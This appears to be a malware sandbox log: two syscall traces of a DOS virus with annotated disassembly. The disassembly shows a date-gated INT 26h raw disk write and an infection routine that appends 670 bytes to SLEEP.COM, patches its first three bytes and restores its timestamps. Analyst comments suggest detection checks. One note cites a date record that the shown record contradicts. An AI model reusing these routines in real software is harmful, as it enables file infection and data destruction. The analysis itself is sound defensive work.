; Date-gated trigger: year, month and day are tested one after another, each against
; its own threshold; only if all three pass does control reach the INT 26h sequence
; at 0x12ab2.
; NOTE(review): this run logs no further Get date; the next entry is Find first file,
; so presumably the year test failed. The JSON record just above this run's
; "Syscalls:" header (Day 22, Month 1, Year 1980) looks like the emulated date;
; confirm against the sandbox's format.
2018-12-25T12:30:03.830838285Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6  ; CX = year from Get date; 0x7c6 = 1990
0x12a98: jge 0x12a9c  ; year >= 1990 (signed compare): continue to the month test
0x12a9a: jmp 0x12ac4  ; otherwise skip the trigger
0x12a9c: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a9e: int 0x21
0x12aa0: cmp dh, 6  ; DH = month
0x12aa3: jge 0x12aa7  ; month >= 6: continue to the day test
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a  ; third Get date call
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system (the destructive step)
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:03.833121478Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:03.839168988Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:03.844467349Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:04.653950274Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:04.661374598Z 87 PC: 12b9e | Get or set file date and time
; Code window printed from the return address of INT 21h/AH=2Ch (Get time): start of
; the routine that modifies the opened file (SLEEP.COM in this run's log).
; Reading it with the log entries around it: an attribute call and a date/time call
; precede the writes and follow them (presumably save, then restore), 670 bytes are
; written after the seek to end of file, and 3 bytes after a second seek. Timestamps
; are therefore a weak indicator for this sample; file length and the first three
; bytes compared against a known-good copy are the useful checks.
2018-12-25T12:30:04.662730469Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7  ; DH = seconds from Get time, masked to 0..7
0x12bab: jmp 0x12bad  ; unconditional jump to the next instruction: the masked value is not tested in this window
0x12bad: mov ah, 0x3f  ; AH=3Fh: read from file handle
0x12baf: mov cx, 3  ; three bytes
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si  ; destination buffer = SI+0x21
0x12bb7: int 0x21  ; logged below as "Read 3 bytes on handle 5"
0x12bb9: jb 0x12c0e  ; carry set = DOS error: abandon the modification
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e  ; fewer than 3 bytes read: abandon
0x12bc0: mov ax, 0x4202  ; AH=42h/AL=02h: move file pointer relative to end of file
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0  ; offset CX:DX = 0, so the call returns the file length
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax  ; AX = low word of the length
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax  ; length-3 saved at SI+0x25; presumably the operand of the 3-byte jump written at the file start (TODO confirm)
0x12bd5: add cx, 0x2fd  ; length + 0x2fd kept in CX; its use lies past the end of this window
0x12bd9: mov di, si
2018-12-25T12:30:04.664788968Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:04.669597776Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:04.671062872Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:04.782966825Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:04.785081627Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:04.791840538Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:04.793233478Z 62 PC: 12c23 | Close file
2018-12-25T12:30:04.9265989Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:05.0637534Z 26 PC: 12c3b | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11157,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:04.877555514Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:04.878833636Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:04.880841855Z 26 PC: 12a85 | Set disk transfer address
; Code window printed from the return address of INT 21h/AH=2Ah (Get date). It is a
; linear listing: both arms of every branch appear, so it is not the executed path.
; Date-gated trigger: year, month and day are tested one after another, each against
; its own threshold; only if all three pass does control reach the INT 26h sequence
; at 0x12ab2.
; NOTE(review): this run logs no further Get date; the next entry is Find first file,
; so presumably the year test failed. The JSON record just above this run's
; "Syscalls:" header (Year 1980) looks like the emulated date; confirm against the
; sandbox's format.
2018-12-25T12:30:04.882451068Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6  ; CX = year from Get date; 0x7c6 = 1990
0x12a98: jge 0x12a9c  ; year >= 1990 (signed compare): continue to the month test
0x12a9a: jmp 0x12ac4  ; otherwise skip the trigger
0x12a9c: mov ah, 0x2a  ; AH=2Ah: Get date again
0x12a9e: int 0x21
0x12aa0: cmp dh, 6  ; DH = month
0x12aa3: jge 0x12aa7  ; month >= 6: continue to the day test
0x12aa5: jmp 0x12ac4
0x12aa7: mov ah, 0x2a  ; third Get date call
0x12aa9: int 0x21
0x12aab: cmp dl, 0x16  ; DL = day of month; 0x16 = 22
0x12aae: jge 0x12ab2  ; day >= 22: fall into the disk-write setup
0x12ab0: jmp 0x12ac4
0x12ab2: mov al, 1  ; INT 26h argument: AL = drive number (1 = B: in the 0 = A: numbering)
0x12ab4: mov cx, 1  ; CX = number of sectors: one
0x12ab7: mov dx, 0  ; DX = first logical sector: 0
0x12aba: mov ds, word ptr [di + 0x37]  ; DS:BX = source buffer; contents not visible in this trace
0x12abd: mov bx, word ptr [di + 0x63]
0x12ac0: int 0x26  ; DOS absolute disk write: raw sector write that bypasses the file system (the destructive step)
0x12ac2: jmp 0x12ac4
2018-12-25T12:30:04.885374539Z 78 PC: 12b3c | Find first file
2018-12-25T12:30:04.893610403Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T12:30:04.900717919Z 67 PC: 12b88 | Get or set file attributes
2018-12-25T12:30:05.543689166Z 61 PC: 12b92 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:05.54878029Z 87 PC: 12b9e | Get or set file date and time
; Code window printed from the return address of INT 21h/AH=2Ch (Get time): start of
; the routine that modifies the opened file (SLEEP.COM in this run's log).
; Reading it with the log entries around it: an attribute call and a date/time call
; precede the writes and follow them (presumably save, then restore), 670 bytes are
; written after the seek to end of file, and 3 bytes after a second seek. Timestamps
; are therefore a weak indicator for this sample; file length and the first three
; bytes compared against a known-good copy are the useful checks.
2018-12-25T12:30:05.549902494Z 44 PC: 12ba8 | Get time 0x12ba8: and dh, 7  ; DH = seconds from Get time, masked to 0..7
0x12bab: jmp 0x12bad  ; unconditional jump to the next instruction: the masked value is not tested in this window
0x12bad: mov ah, 0x3f  ; AH=3Fh: read from file handle
0x12baf: mov cx, 3  ; three bytes
0x12bb2: mov dx, 0x21
0x12bb5: add dx, si  ; destination buffer = SI+0x21
0x12bb7: int 0x21  ; logged below as "Read 3 bytes on handle 5"
0x12bb9: jb 0x12c0e  ; carry set = DOS error: abandon the modification
0x12bbb: cmp ax, 3
0x12bbe: jne 0x12c0e  ; fewer than 3 bytes read: abandon
0x12bc0: mov ax, 0x4202  ; AH=42h/AL=02h: move file pointer relative to end of file
0x12bc3: mov cx, 0
0x12bc6: mov dx, 0  ; offset CX:DX = 0, so the call returns the file length
0x12bc9: int 0x21
0x12bcb: jb 0x12c0e
0x12bcd: mov cx, ax  ; AX = low word of the length
0x12bcf: sub ax, 3
0x12bd2: mov word ptr [si + 0x25], ax  ; length-3 saved at SI+0x25; presumably the operand of the 3-byte jump written at the file start (TODO confirm)
0x12bd5: add cx, 0x2fd  ; length + 0x2fd kept in CX; its use lies past the end of this window
0x12bd9: mov di, si
2018-12-25T12:30:05.551427092Z 63 PC: 12bb9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:05.556356798Z 66 PC: 12bcb | Move file pointer
2018-12-25T12:30:05.557547027Z 64 PC: 12bee | Write file or device (Write 670 bytes on handle 5)
2018-12-25T12:30:05.563505462Z 66 PC: 12c00 | Move file pointer
2018-12-25T12:30:05.565862312Z 64 PC: 12c0e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:05.570318912Z 87 PC: 12c1f | Get or set file date and time
2018-12-25T12:30:05.571410395Z 62 PC: 12c23 | Close file
2018-12-25T12:30:05.580589672Z 67 PC: 12c30 | Get or set file attributes
2018-12-25T12:30:05.592218914Z 26 PC: 12c3b | Set disk transfer address